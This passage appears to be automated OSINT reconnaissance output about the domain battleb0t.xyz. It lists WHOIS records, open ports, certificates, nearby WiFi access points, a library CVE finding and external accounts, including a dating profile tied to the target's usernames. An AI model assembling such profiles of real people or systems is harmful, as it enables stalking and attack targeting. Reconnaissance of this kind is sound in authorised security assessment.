Registrar Registration Expiration Date: 2023-09-07T23:59:59.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: 677814ebbbc94b77b8833f353c860afe.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: 677814ebbbc94b77b8833f353c860afe.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: 677814ebbbc94b77b8833f353c860afe.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T07:59:45.60Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 03:00:49 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0-range.github.io | 185.199.111.153 |
| 2023-05-12 03:13:02 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [000.github.io]
https://www.openphish.com/feed.txt | 000.github.io |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | GOLFNET (Net ID: 00:05:3C:07:87:1A) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:08:52 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.129 | 34.148.97.127 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | RichA (Net ID: 00:02:6F:8D:88:99) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:54:48 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 34.148.97.127:443 | 34.148.97.127 |
| 2023-05-12 02:44:06 | Internet Name | No | CertSpotter | 37 | 0 | 1 | 0 | None | kekw.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SX551548FF6 (Net ID: 00:01:E3:54:8F:F6) | 52.3759, 4.8975 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | osbridge (Net ID: 00:15:D6:54:08:08) | 40.2024, 29.0398 |
| 2023-05-12 02:54:21 | HTTP Status Code | No | Web Spider | 0 | 1 | 3 | 0 | None | 521 | vscode.battleb0t.xyz |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BBHWIRELESS (Net ID: 00:00:C5:D7:60:2C) | 41.8781, -87.6298 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | internal (Net ID: 00:0C:41:12:D6:E5) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:45:48 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 2 | 0 | None | {u'city': u'Chicago', u'security': {u'is_vpn': False}, u'city_geoname_id': 4887398, u'region_geoname_id': 4896861, u'country': u'United States', u'region': u'Illinois', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'CLOUDFLARENET', u'isp_name': u'Cloudflare, Inc.', u'organization_name': u'Cloudflare, Inc.', u'autonomous_system_number': 13335}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'60666', u'longitude': -87.6298, u'country_code': u'US', u'timezone': {u'abbreviation': u'', u'gmt_offset': u'', u'is_dst': u'', u'name': u'', u'current_time': u''}, u'latitude': 41.8781, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'104.21.6.166', u'continent': u'North America', u'region_iso_code': u'IL'} | 104.21.6.166 |
| 2023-05-12 02:44:24 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.com | 185.199.109.153 |
| 2023-05-12 03:24:51 | Country | No | Country Name Extractor | 0 | 0 | 7 | 0 | None | Iceland | Domain Name: NETCRAFT.COM
Registry Domain ID: 509179_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2022-12-07T10:43:50Z
Creation Date: 1994-10-18T04:00:00Z
Registry Expiry Date: 2026-10-17T04:00:00Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: AUTHNS1.NETCRAFT.COM
Name Server: AUTHNS2.NETCRAFT.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain name: netcraft.com
Registry Domain ID: 509179_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2020-09-21T12:40:37.88Z
Creation Date: 1994-10-18T04:00:00.00Z
Registrar Registration Expiration Date: 2026-10-17T04:00:00.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Name Server: authns1.netcraft.com
Name Server: authns2.netcraft.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T07:56:11.35Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cross-origin-opener-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=jsIMdWNoCwdQGyyZGyYA%2Bk%2F%2FuxOwhAu2H4z%2BlgqTotxGWPo8hqWsqluH0WQNJMNDxGIz%2FauzgzXUlj2TX7zY2FcfHDEdJ6DQfKAJa9S%2BlmMzgJ2oNDB%2FfptzTg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5e7988238a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:45:41 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 2 | 0 | None | 34.0544, -118.244 | 185.199.110.153 |
| 2023-05-12 03:08:52 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.134 | 34.148.97.127 |
| 2023-05-12 03:09:18 | Vulnerability - General | Yes | Tool - Retire.js | 0 | 0 | 4 | 0 | None | CVE-2018-20676
Score: Unknown
Description: Unknown | https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | giters (Category: coding)
https://giters.com/ayshoo | ayshoo |
| 2023-05-12 02:56:39 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | {u'count': 22, u'search_terms': [{u'id': u'host', u'value': u'35.229.48.116'}], u'result': [{u'environment_id': 100, u'job_id': u'63b986ad26465530bf3c5b04', u'analysis_start_time': u'2023-01-07 14:50:21', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': 0, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'89e65ebf9fe9f36ad886ea2ddd214e008b4eeb7c22ca04209ce7deac981a94a9', u'type': None, u'type_short': u'url', u'size': 86}, {u'environment_id': 100, u'job_id': u'63b92c8657cbe2638645fbb8', u'analysis_start_time': u'2023-01-07 08:25:43', u'vx_family': None, u'av_detect': None, u'environment_description': u'Windows 7 32 bit', u'threat_score': 5, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'4fe7f3926ed2b158addbe63f033c304e862259142b32f200571083f8c1090bb7', u'type': None, u'type_short': u'url', u'size': 101}, {u'environment_id': 100, u'job_id': u'63b3fbb4c539537999674635', u'analysis_start_time': u'2023-01-03 09:56:04', u'vx_family': None, u'av_detect': None, u'environment_description': u'Windows 7 32 bit', u'threat_score': 5, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'2ae5b7c90552dc0bfea77a833120647de0ca8b44c885d2e86b08755bfe2b0d49', u'type': None, u'type_short': u'url', u'size': 101}, {u'environment_id': 160, u'job_id': u'63b1da6cb79fb1747e53944f', u'analysis_start_time': u'2023-01-01 19:09:33', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': 12, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'e862398af05408b5525884a6662ae362c288705f989b2cd5081292d2da304d80', u'type': None, u'type_short': u'url', u'size': 44}, {u'environment_id': 100, u'job_id': u'63a10361e52f927e9b6ad72e', u'analysis_start_time': u'2022-12-20 00:35:45', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'0436572e0157f3d15b4fa79e524a513056120fb7d03e1c4be18bdbcd56f39aff', u'type': None, u'type_short': u'url', u'size': 69}, {u'environment_id': 160, u'job_id': u'63766b07cf04ba1b220d8dc2', u'analysis_start_time': u'2022-11-17 17:10:31', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'550f4c1b7c66a8517e2fb20ccc1c6ecef30f91a48349272d21e14ef78628f8a8', u'type': None, u'type_short': u'url', u'size': 55}, {u'environment_id': 100, u'job_id': u'636ef180d1c9326a4925b600', u'analysis_start_time': u'2022-11-12 01:06:09', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'f2556fc666fab8b0a67e68a03ff96d5347ebdf46fb79425a5c19338fdb8dd50b', u'type': None, u'type_short': u'url', u'size': 48}, {u'environment_id': 120, u'job_id': u'636c9fea72902d08670f15f1', u'analysis_start_time': u'2022-11-10 06:53:32', u'vx_family': u'Phishing site', u'av_detect': u'4', u'environment_description': u'Windows 7 64 bit', u'threat_score': 23, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'06e49fbb3c930e8bd8b0d29d4a0c65b34b42f07ba50d749759da507c357cd57a', u'type': None, u'type_short': u'url', u'size': 77}, {u'environment_id': 100, u'job_id': u'63597f52cf986273167b3dec', u'analysis_start_time': u'2022-10-26 18:41:23', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'9b6c767a83ad9e101aab7875c03fef9998ebb634994a68f092455fcef09b37ca', u'type': None, u'type_short': u'url', u'size': 336}, {u'environment_id': 100, u'job_id': u'6356dc85352138257c019e52', u'analysis_start_time': u'2022-10-24 18:42:14', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'dadadaa15e19ef9c2a983600ba16684260f2d8a2ad7abdae5ef4d3720e3f04c1', u'type': None, u'type_short': u'url', u'size': 341}, {u'environment_id': 100, u'job_id': u'6340254340d16e0a2d1801df', u'analysis_start_time': u'2022-10-07 13:10:28', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'3915ff7b4886499db28474c559936c4f13989a8c13d55ca8942d98b74060b5bf', u'type': None, u'type_short': u'url', u'size': 101}, {u'environment_id': 100, u'job_id': u'633c30aeb54aab03fc436a24', u'analysis_start_time': u'2022-10-04 13:11:00', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'8438978d36659fe126de5bdf3ff6506b6bebd65b79dbcdbbe5065d46ba16d3d8', u'type': None, u'type_short': u'url', u'size': 74}, {u'environment_id': 120, u'job_id': u'6331078cc06cef77a66ec199', u'analysis_start_time': u'2022-09-26 02:06:11', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 64 bit', u'threat_score': 68, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'0186b731d95e1f78a0fb99ab26860d1ebf02a69172fea4abff63ad144a6337e6', u'type': None, u'type_short': u'url', u'size': 46}, {u'environment_id': 100, u'job_id': u'6330fa73468b0c35ca1d3a9d', u'analysis_start_time': u'2022-09-26 01:03:50', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'accc235394b4acee27b8e42680741b4877ea836c33c661627b29cf8bd13f106f', u'type': None, u'type_short': u'url', u'size': 71}, {u'environment_id': 100, u'job_id': u'63292843cc561b278a0caa96', u'analysis_start_time': u'2022-09-20 02:41:07', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': 65, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'79c6aa841bf5874b35646cf7f5a083e6887cd50479d71ea9646f728d9c68e9b9', u'type': None, u'type_short': u'url', u'size': 46}, {u'environment_id': 100, u'job_id': u'630c1fdca1db121fef77b765', u'analysis_start_time': u'2022-08-29 02:09:33', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'6b13c22a4e454fe47c4fa9acd4bd8e10514224bc7663c6251b69fd1d650a7795', u'type': None, u'type_short': u'url', u'size': 67}, {u'environment_id': 100, u'job_id': u'62fb6612840ec63784115ce2', u'analysis_start_time': u'2022-08-16 09:40:35', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'7df1a40eceecc8b444d042c1ffe4058ab057ba7b8d9023392e6fb5997947e311', u'type': None, u'type_short': u'url', u'size': 50}, {u'environment_id': 100, u'job_id': u'62f5a4518bfb7009a87660a0', u'analysis_start_time': u'2022-08-12 00:52:33', u'vx_family': u'Phishing site', u'av_detect': u'6', u'environment_description': u'Windows 7 32 bit', u'threat_score': 10, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'46e02f3d16603e5230418b021dd86036c13652e45ecaa2cdeb9280bcdefd5d71', u'type': None, u'type_short': u'url', u'size': 66}, {u'environment_id': 110, u'job_id': u'62ebcf1020213241597b9103', u'analysis_start_time': u'2022-08-04 13:52:17', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'2c2d2330c4f28de32b7457f0d5738e086e1fe21b38f44dc0bf301963aac2537d', u'type': None, u'type_short': u'url', u'size': 116}, {u'environment_id': 100, u'job_id': u'62eb1142edfef557984a6458', u'analysis_start_time': u'2022-08-04 00:22:27', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'b9380c0d5fb860d1b55d8764ccc4ac1c86489a28c0a63f3e01ffd798d9030cec', u'type': None, u'type_short': u'url', u'size': 75}, {u'environment_id': 100, u'job_id': u'62df7746a88af4304c4ab329', u'analysis_start_time': u'2022-07-26 05:19:12', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': 29, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'9602d6371d64899a229eb0561ab5fd34b3b0b9b26d204d55960e81d2750de0f0', u'type': None, u'type_short': u'url', u'size': 67}, {u'environment_id': 100, u'job_id': u'62df3d0d7dfb34397974c439', u'analysis_start_time': u'2022-07-26 01:02:05', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': 41, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'1be19964b1f53d0263d13c642802d5154e9dcd14fef7264b7b797d81cb3d01f7', u'type': None, u'type_short': u'url', u'size': 81}]} | 35.229.48.116 |
| 2023-05-12 02:52:20 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:34:48:36:b2:51:77:1f:45:f7:ca:23:53:09:6b:f8:20:f7
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 27 01:46:18 2022 GMT
Not After : Mar 27 01:46:17 2023 GMT
Subject: CN=oldfluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:b7:86:7e:22:b8:47:2a:2a:20:fc:69:54:4c:4c:
8d:ea:3f:a1:0c:0e:11:0f:7e:c1:26:df:52:aa:7e:
94:3a:df:e1:4c:c1:e1:54:54:7a:c2:7a:eb:d8:cc:
df:41:19:00:a3:7b:e6:18:3e:51:47:37:04:be:39:
e6:bf:91:38:96:6a:40:69:b8:63:75:51:8c:52:3a:
41:07:8f:c4:ec:e7:d6:72:77:98:6d:17:b7:fd:4c:
4c:0f:1e:e2:38:f3:1e:28:62:8d:25:cc:29:b7:fc:
af:91:3e:9d:e5:92:07:d2:8d:09:ca:64:eb:80:76:
ae:38:a2:33:49:07:84:c8:02:f9:d3:21:2b:ce:01:
78:68:73:b9:2a:22:16:eb:78:90:34:44:73:52:fa:
b4:e5:7a:78:b5:62:9e:70:95:d0:26:0e:c1:b7:b4:
12:fd:9f:10:09:67:d9:3c:f0:82:32:ed:27:d0:55:
a7:30:ce:0b:b7:0a:ef:86:ec:19:5d:c1:a0:11:f8:
d8:f7:da:51:1c:ce:c6:23:90:13:7e:ab:f3:de:c1:
8e:52:9d:26:8b:16:dc:5c:ae:23:f8:3d:43:96:47:
e1:0d:83:73:94:c2:e5:ad:91:ed:93:fe:48:67:3b:
6c:8e:00:5a:b6:2f:0f:94:18:91:b3:ed:bb:bf:d8:
25:d1
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
73:BD:0E:B3:ED:9F:6A:FE:37:97:44:54:03:BB:B6:CC:83:95:C8:48
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:oldfluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 27 02:46:18.221 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:73:56:94:2F:31:A8:B8:1A:98:8B:10:59:
F6:53:2E:1E:0E:70:CF:6D:BF:D5:0A:CF:1C:31:3D:5B:
4C:23:37:67:02:21:00:9B:F2:01:A0:12:B4:3C:90:39:
EA:84:E4:22:FA:75:BD:A0:C4:ED:89:F2:6C:18:97:FC:
B8:F5:F0:56:AE:8E:01
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Dec 27 02:46:18.274 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:05:3B:2E:33:08:22:D3:2E:0C:71:5D:CE:
BB:25:C6:58:42:B3:AE:CA:D4:8F:0C:AD:30:6E:E3:A1:
6E:7B:1D:DD:02:21:00:B2:4C:68:98:17:12:76:10:DB:
F7:E5:7C:1B:1E:CC:3D:22:69:57:D1:43:50:5C:F3:6B:
C4:4A:45:D2:97:77:5D
Signature Algorithm: sha256WithRSAEncryption
b5:fc:32:be:0b:ef:36:0b:4c:2f:42:14:e0:23:44:71:fe:bb:
33:07:72:8b:73:2a:ff:5f:08:8a:b4:9e:62:31:57:db:a3:8b:
f5:eb:48:64:20:6d:a4:a1:01:ca:d1:c5:02:57:6b:fa:f9:2f:
81:b9:22:b3:b6:f7:75:49:42:43:c2:49:2f:7b:79:d9:5f:e2:
e1:45:6e:ec:6b:80:ad:7d:c6:5c:28:b1:1a:b9:4e:15:e6:17:
ae:e5:e8:ce:6c:bb:82:2d:39:fb:ee:42:88:dd:71:2d:32:a2:
58:59:d5:82:ef:a1:1f:ed:eb:e8:31:65:9c:54:f9:39:7e:04:
23:d4:63:6c:f9:8a:fc:fe:32:6a:54:24:b9:87:53:d3:3a:ad:
b3:bc:74:e2:09:7e:05:f6:6a:b2:b2:c9:5d:15:04:56:51:5c:
3a:24:39:1f:c5:f0:1f:67:f8:ff:79:1d:11:62:57:f1:41:b4:
c9:fc:7e:59:46:0a:3f:48:58:e0:4d:a6:0a:10:72:2e:ed:1f:
b6:1b:19:4d:de:20:09:8c:c8:8c:26:1e:82:7a:3b:88:90:1a:
7c:c4:2b:f0:2f:ca:82:25:42:7e:50:54:62:30:3f:49:63:0c:
7d:f1:3b:f3:90:d8:3c:ee:c3:09:83:3d:a5:08:3a:22:6f:f5:
e3:2e:e6:d2
| battleb0t.xyz |
| 2023-05-12 03:18:47 | Raw File Meta Data | No | File Metadata Extractor | 0 | 0 | 4 | 0 | None | {'Image Orientation': (0x0112) Short=Horizontal (normal) @ 18} | https://pics.battleb0t.xyz/images/withat_2.jpg |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | FriendFinder-X (Category: dating)
https://www.friendfinder-x.com/profile/ayhu | ayhu |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 2 | 0 | None | cross-origin-resource-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=WwRFDMWv1i%2FLL8I%2BSQXrEl8P6VG5M1GGitMkpd4FkAGmtOdqQDCLc17nGzjDcmqZpet%2BvxBX8CUcOAv3alTgafYDwFhVZzoAKiiOmj1uFX8dLMhZ1ZA2lQdL%2FA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60363a5a178c-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:44:05 | SSL Certificate - Issued by | No | CertSpotter | 0 | 0 | 1 | 0 | None | C=US,O=Let's Encrypt,CN=R3 | battleb0t.xyz |
